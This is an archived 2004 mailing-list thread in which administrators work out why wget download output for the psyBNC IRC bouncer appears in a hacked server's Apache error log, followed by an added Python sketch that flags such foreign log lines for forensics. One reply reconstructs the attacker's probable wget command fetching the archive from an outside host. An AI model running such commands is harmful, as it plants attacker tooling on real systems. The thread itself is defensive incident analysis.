Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 12:04:58PM +1100, Russell Coker wrote:
> Looks like they used wget to download psybnc, it's an IRC bot.

No, psybnc is an IRC bouncer and the archive includes a binary and the
sources:

| $ file psybnc
| psybnc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, statically linked, stripped

So I assume it's a script kiddy which wants to abuse several IRC servers.

Bastian

-- 
Superior ability breeds superior ambition.
    -- Spock, "Space Seed", stardate 3141.9

Re: strange apache error.log entry
François TOURDE wrote:
> On the 12438th day after Epoch, [EMAIL PROTECTED] wrote:
>> Hi,
>>
>>> can you tell me what the following means in an apache error.log and
>>
>> The log is the output of wget command. Most probably the command which
>> resulted in this entry is "wget
>> http://www.geocities.com/fonias28/psybnc.tgz -o
>> /var/log/apache/error.log"
>
> Or just a php script allowing execution of commands, then wget was
> launched this way...
>
> Check your machine, it can be compromised :)

I already know that the machine got compromised, I came across these log
lines while searching which hole was used...

best regards
markus

Re: strange apache error.log entry
Jan Minar wrote:
> On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote:
>
> I don't know what the surrounding lines are, but the core of your
> posting is a wget(1) logfile/stderr output :-) This isn't the standard
> wget in the main distribution; IIRC, it's the busybox' one. Busybox'
> small footprint makes it ideal for floppy-based distros & rescue disks
> (such as Debian boot-floppies).

sure, I know what wget is ;-) the interesting thing is that these lines
are in the apache log-file (the surrounding two lines belong to apache)

best regards

> > >/var/log/apache/error.log:
> > >>[Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg
>
> Beginning of wget output:
>
> > >>--14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz
> > >>14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509]
>
> End of wget output (maybe the following blank line belongs to it, too).
>
> > >>[Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg

Re: strange apache error.log entry
On the 12438th day after Epoch, [EMAIL PROTECTED] wrote:
> Hi,
>
>> can you tell me what the following means in an apache error.log and
>
> The log is the output of wget command. Most probably the command which
> resulted in this entry is "wget
> http://www.geocities.com/fonias28/psybnc.tgz -o
> /var/log/apache/error.log"

Or just a php script allowing execution of commands, then wget was
launched this way...

Check your machine, it can be compromised :)

-- 
Our houseplants have a good sense of humous.

Re: strange apache error.log entry
On Wed, 21 Jan 2004 11:28, Markus Schabel <[EMAIL PROTECTED]> wrote:
> hello folks!
>
> can you tell me what the following means in an apache error.log and
> where it comes from? I've searched through all other apache log files
> but didn't find something that could generate this.
> (sure, the server got hacked and is out-of-order now...)
>
> > /var/log/apache/error.log:
> >> [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not
> >> exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg --14:59:21--
> >> http://www.geocities.com/fonias28/psybnc.tgz
> >>=> `psybnc.tgz'

Looks like they used wget to download psybnc, it's an IRC bot.

-- 
http://www.coker.com.au/selinux/   My NSA Security Enhanced Linux packages
http://www.coker.com.au/bonnie++/  Bonnie++ hard drive benchmark
http://www.coker.com.au/postal/    Postal SMTP/POP benchmark
http://www.coker.com.au/~russell/  My home page

Re: strange apache error.log entry
Hi,

> can you tell me what the following means in an apache error.log and

The log is the output of wget command. Most probably the command which
resulted in this entry is "wget
http://www.geocities.com/fonias28/psybnc.tgz -o
/var/log/apache/error.log"

Rgds,
Girish.

Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote:

I don't know what the surrounding lines are, but the core of your
posting is a wget(1) logfile/stderr output :-) This isn't the standard
wget in the main distribution; IIRC, it's the busybox' one. Busybox'
small footprint makes it ideal for floppy-based distros & rescue disks
(such as Debian boot-floppies).

> >/var/log/apache/error.log:
> >>[Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not
> >>exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg

Beginning of wget output:

> >>--14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz
> >>14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509]

End of wget output (maybe the following blank line belongs to it, too).

> >>
> >>
> >>[Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not
> >>exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg

HTH.

-- 
Jan Minar                   "Please don't CC me, I'm subscribed." x 9

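Added example (not part of the thread and not any poster's code): a process started by Apache, such as a CGI script or a command run from PHP, normally inherits the server's stderr, which is how tool output like wget's can land in error.log. The sketch below flags lines in an Apache 1.3-style error log that lack the `[timestamp] [level]` prefix and reports the Apache timestamps on either side, giving a window to correlate with access.log; the sample input is reconstructed from the excerpts quoted in the thread, and the function and field names are hypothetical.

```python
import re
from datetime import datetime

# Apache 1.3-style error_log prefix: [Sun Jan 18 14:54:35 2004] [error] ...
APACHE = re.compile(r"^\[(\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4})\] \[\w+\] ")
# wget(1) lines in the form quoted in the thread
WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"^\d\d:\d\d:\d\d \([^)]*\) - `([^']+)' saved \[(\d+)/\d+\]")

# Sample input reconstructed from the excerpts quoted in the thread.
SAMPLE = """\
[Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg
--14:59:21--  http://www.geocities.com/fonias28/psybnc.tgz
           => `psybnc.tgz'
14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509]

[Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg
"""


def find_foreign_lines(text):
    """Return lines not written by Apache's logger, with bracketing timestamps."""
    findings, last_ts = [], None
    for number, line in enumerate(text.splitlines(), 1):
        m = APACHE.match(line)
        if m:
            last_ts = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
            for f in findings:          # close any window still open
                if f["before"] is None:
                    f["before"] = last_ts
            continue
        if not line.strip():
            continue                    # blank lines carry no evidence
        kind, detail = "unknown", None
        if (w := WGET_START.match(line)):
            kind, detail = "wget-start", w.group(2)
        elif (w := WGET_SAVED.match(line)):
            kind, detail = "wget-saved", (w.group(1), int(w.group(2)))
        findings.append({"line": number, "kind": kind, "detail": detail,
                         "after": last_ts, "before": None, "text": line})
    return findings


if __name__ == "__main__":
    for f in find_foreign_lines(SAMPLE):
        print(f["line"], f["kind"], f["detail"], f["after"], f["before"])
```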